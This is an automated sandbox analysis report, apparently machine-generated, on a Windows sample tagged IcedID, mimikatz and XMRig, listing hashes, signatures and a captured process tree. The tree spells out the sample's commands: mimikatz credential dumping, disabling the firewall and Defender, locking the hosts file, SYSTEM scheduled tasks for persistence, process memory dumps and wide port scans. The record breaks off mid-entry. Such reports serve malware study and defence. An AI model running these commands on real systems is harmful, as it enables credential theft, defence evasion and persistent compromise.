Analysis

  • max time kernel
    151s
  • max time network
    178s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-04-2024 23:27

General

  • Target

    2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe

  • Size

    10.8MB

  • MD5

    52e2e34e9b5a6136df55f31ad0891e02

  • SHA1

    df83b35207901fdf28714c4b95f2ebd06a2c94b8

  • SHA256

    1e7ee52c8a07bde261b71574bf7bbcb7bf9ce1bd2524270498aeb30869ddb0fb

  • SHA512

    ca361c6c0f65bb6e3f1b6c68433acbd0a505e56a6b931171b808c09d5a9916c12971a306525f0be3f52ca345bd57c31cdaaf2223e8a58819cde73d6e6f45e629

  • SSDEEP

    98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Malware Config

Signatures

  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (26750) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
  • UPX dump on OEP (original entry point) 39 IoCs
  • XMRig Miner payload 11 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 4 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file execution options in registry 2 TTPs 40 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2152
      • C:\Windows\TEMP\urfucfzpe\ecfkkq.exe
        "C:\Windows\TEMP\urfucfzpe\ecfkkq.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:872
    • C:\Users\Admin\AppData\Local\Temp\2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1668
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\kmydietv\bbleyvb.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4260
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:3832
        • C:\Windows\kmydietv\bbleyvb.exe
          C:\Windows\kmydietv\bbleyvb.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4952
    • C:\Windows\kmydietv\bbleyvb.exe
      C:\Windows\kmydietv\bbleyvb.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1856
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3912
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:4404
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:2332
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:4704
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:2384
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:4012
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:2996
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                      PID:2580
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add policy name=Bastards description=FuckingBastards
                      2⤵
                        PID:2372
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filteraction name=BastardsList action=block
                        2⤵
                          PID:4336
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c C:\Windows\nzlegstrv\yuiezklii\wpcap.exe /S
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2900
                          • C:\Windows\nzlegstrv\yuiezklii\wpcap.exe
                            C:\Windows\nzlegstrv\yuiezklii\wpcap.exe /S
                            3⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in System32 directory
                            • Drops file in Program Files directory
                            • Suspicious use of WriteProcessMemory
                            PID:4960
                            • C:\Windows\SysWOW64\net.exe
                              net stop "Boundary Meter"
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4416
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop "Boundary Meter"
                                5⤵
                                  PID:4276
                              • C:\Windows\SysWOW64\net.exe
                                net stop "TrueSight Meter"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1928
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop "TrueSight Meter"
                                  5⤵
                                    PID:2564
                                • C:\Windows\SysWOW64\net.exe
                                  net stop npf
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1900
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop npf
                                    5⤵
                                      PID:916
                                  • C:\Windows\SysWOW64\net.exe
                                    net start npf
                                    4⤵
                                      PID:964
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 start npf
                                        5⤵
                                          PID:4512
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c net start npf
                                    2⤵
                                      PID:2164
                                      • C:\Windows\SysWOW64\net.exe
                                        net start npf
                                        3⤵
                                          PID:1016
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 start npf
                                            4⤵
                                              PID:4760
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c net start npf
                                          2⤵
                                            PID:1888
                                            • C:\Windows\SysWOW64\net.exe
                                              net start npf
                                              3⤵
                                                PID:4428
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start npf
                                                  4⤵
                                                    PID:4792
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\nzlegstrv\yuiezklii\lcsfzibut.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\nzlegstrv\yuiezklii\Scant.txt
                                                2⤵
                                                  PID:4044
                                                  • C:\Windows\nzlegstrv\yuiezklii\lcsfzibut.exe
                                                    C:\Windows\nzlegstrv\yuiezklii\lcsfzibut.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\nzlegstrv\yuiezklii\Scant.txt
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:4564
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\nzlegstrv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nzlegstrv\Corporate\log.txt
                                                  2⤵
                                                  • Drops file in Windows directory
                                                  PID:3108
                                                  • C:\Windows\nzlegstrv\Corporate\vfshost.exe
                                                    C:\Windows\nzlegstrv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4740
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mbybyunnc" /ru system /tr "cmd /c C:\Windows\ime\bbleyvb.exe"
                                                  2⤵
                                                    PID:4212
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      3⤵
                                                        PID:1620
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /create /sc minute /mo 1 /tn "mbybyunnc" /ru system /tr "cmd /c C:\Windows\ime\bbleyvb.exe"
                                                        3⤵
                                                        • Creates scheduled task(s)
                                                        PID:2756
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bbpdkeeml" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F"
                                                      2⤵
                                                        PID:3088
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                          3⤵
                                                            PID:4268
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /sc minute /mo 1 /tn "bbpdkeeml" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F"
                                                            3⤵
                                                            • Creates scheduled task(s)
                                                            PID:364
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pbrbftibc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F"
                                                          2⤵
                                                            PID:212
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              3⤵
                                                                PID:1424
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /sc minute /mo 1 /tn "pbrbftibc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F"
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:1736
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                              2⤵
                                                                PID:5020
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                                2⤵
                                                                  PID:2796
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                  2⤵
                                                                    PID:4200
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                    2⤵
                                                                      PID:1696
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                      2⤵
                                                                        PID:3584
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                        2⤵
                                                                          PID:4236
                                                                        • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                          C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 780 C:\Windows\TEMP\nzlegstrv\780.dmp
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1292
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                          2⤵
                                                                            PID:2388
                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                            netsh ipsec static set policy name=Bastards assign=y
                                                                            2⤵
                                                                              PID:776
                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                              2⤵
                                                                                PID:60
                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                                2⤵
                                                                                  PID:1648
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                                  2⤵
                                                                                    PID:2492
                                                                                  • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                    C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 1020 C:\Windows\TEMP\nzlegstrv\1020.dmp
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3944
                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                                    2⤵
                                                                                      PID:4680
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c net stop SharedAccess
                                                                                      2⤵
                                                                                        PID:4220
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          net stop SharedAccess
                                                                                          3⤵
                                                                                            PID:1644
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 stop SharedAccess
                                                                                              4⤵
                                                                                                PID:1620
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c netsh firewall set opmode mode=disable
                                                                                            2⤵
                                                                                              PID:4224
                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                netsh firewall set opmode mode=disable
                                                                                                3⤵
                                                                                                • Modifies Windows Firewall
                                                                                                PID:1564
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c netsh Advfirewall set allprofiles state off
                                                                                              2⤵
                                                                                                PID:4788
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh Advfirewall set allprofiles state off
                                                                                                  3⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:1736
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c net stop MpsSvc
                                                                                                2⤵
                                                                                                  PID:3088
                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                    net stop MpsSvc
                                                                                                    3⤵
                                                                                                      PID:4060
                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                        C:\Windows\system32\net1 stop MpsSvc
                                                                                                        4⤵
                                                                                                          PID:2952
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c net stop WinDefend
                                                                                                      2⤵
                                                                                                        PID:1964
                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                          net stop WinDefend
                                                                                                          3⤵
                                                                                                            PID:4644
                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                              C:\Windows\system32\net1 stop WinDefend
                                                                                                              4⤵
                                                                                                                PID:4484
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /c net stop wuauserv
                                                                                                            2⤵
                                                                                                              PID:1660
                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                net stop wuauserv
                                                                                                                3⤵
                                                                                                                  PID:4952
                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                    C:\Windows\system32\net1 stop wuauserv
                                                                                                                    4⤵
                                                                                                                      PID:4040
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /c sc config MpsSvc start= disabled
                                                                                                                  2⤵
                                                                                                                    PID:1068
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc config MpsSvc start= disabled
                                                                                                                      3⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:3492
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c sc config SharedAccess start= disabled
                                                                                                                    2⤵
                                                                                                                      PID:1464
                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                        sc config SharedAccess start= disabled
                                                                                                                        3⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:4512
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c sc config WinDefend start= disabled
                                                                                                                      2⤵
                                                                                                                        PID:180
                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                          sc config WinDefend start= disabled
                                                                                                                          3⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:1048
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c sc config wuauserv start= disabled
                                                                                                                        2⤵
                                                                                                                          PID:1960
                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                            sc config wuauserv start= disabled
                                                                                                                            3⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:4464
                                                                                                                        • C:\Windows\TEMP\xohudmc.exe
                                                                                                                          C:\Windows\TEMP\xohudmc.exe
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:2508
                                                                                                                        • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                          C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2152 C:\Windows\TEMP\nzlegstrv\2152.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4860
                                                                                                                        • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                          C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2552 C:\Windows\TEMP\nzlegstrv\2552.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:776
                                                                                                                        • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                          C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2764 C:\Windows\TEMP\nzlegstrv\2764.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:760
                                                                                                                        • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                          C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2844 C:\Windows\TEMP\nzlegstrv\2844.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1276
                                                                                                                        • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                          C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3100 C:\Windows\TEMP\nzlegstrv\3100.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2248
                                                                                                                        • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                          C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3844 C:\Windows\TEMP\nzlegstrv\3844.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2448
                                                                                                                        • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                          C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3980 C:\Windows\TEMP\nzlegstrv\3980.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:920
                                                                                                                        • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                          C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 4052 C:\Windows\TEMP\nzlegstrv\4052.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1252
                                                                                                                        • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                          C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2192 C:\Windows\TEMP\nzlegstrv\2192.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4652
                                                                                                                        • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                          C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2740 C:\Windows\TEMP\nzlegstrv\2740.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2024
                                                                                                                        • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                          C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 1952 C:\Windows\TEMP\nzlegstrv\1952.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4640
                                                                                                                        • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                          C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 5076 C:\Windows\TEMP\nzlegstrv\5076.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5012
                                                                                                                        • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                          C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 4488 C:\Windows\TEMP\nzlegstrv\4488.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5060
                                                                                                                        • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                          C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3852 C:\Windows\TEMP\nzlegstrv\3852.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2264
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd.exe /c C:\Windows\nzlegstrv\yuiezklii\scan.bat
                                                                                                                          2⤵
                                                                                                                            PID:3712
                                                                                                                            • C:\Windows\nzlegstrv\yuiezklii\zbesiipnm.exe
                                                                                                                              zbesiipnm.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Drops file in Windows directory
                                                                                                                              PID:3044
                                                                                                                          • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                            C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3712 C:\Windows\TEMP\nzlegstrv\3712.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5540
                                                                                                                          • C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe
                                                                                                                            C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3560 C:\Windows\TEMP\nzlegstrv\3560.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4576
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                            2⤵
                                                                                                                              PID:5196
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                3⤵
                                                                                                                                  PID:5564
                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                                                  3⤵
                                                                                                                                    PID:4336
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                    3⤵
                                                                                                                                      PID:5836
                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                                                      3⤵
                                                                                                                                        PID:5896
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                        3⤵
                                                                                                                                          PID:5324
                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                                          3⤵
                                                                                                                                            PID:5956
                                                                                                                                      • C:\Windows\SysWOW64\tyxtue.exe
                                                                                                                                        C:\Windows\SysWOW64\tyxtue.exe
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:3860
                                                                                                                                      • C:\Windows\system32\cmd.EXE
                                                                                                                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F
                                                                                                                                        1⤵
                                                                                                                                          PID:64
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                            2⤵
                                                                                                                                              PID:2492
                                                                                                                                            • C:\Windows\system32\cacls.exe
                                                                                                                                              cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F
                                                                                                                                              2⤵
                                                                                                                                                PID:2328
                                                                                                                                            • C:\Windows\system32\cmd.EXE
                                                                                                                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F
                                                                                                                                              1⤵
                                                                                                                                                PID:1620
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4268
                                                                                                                                                  • C:\Windows\system32\cacls.exe
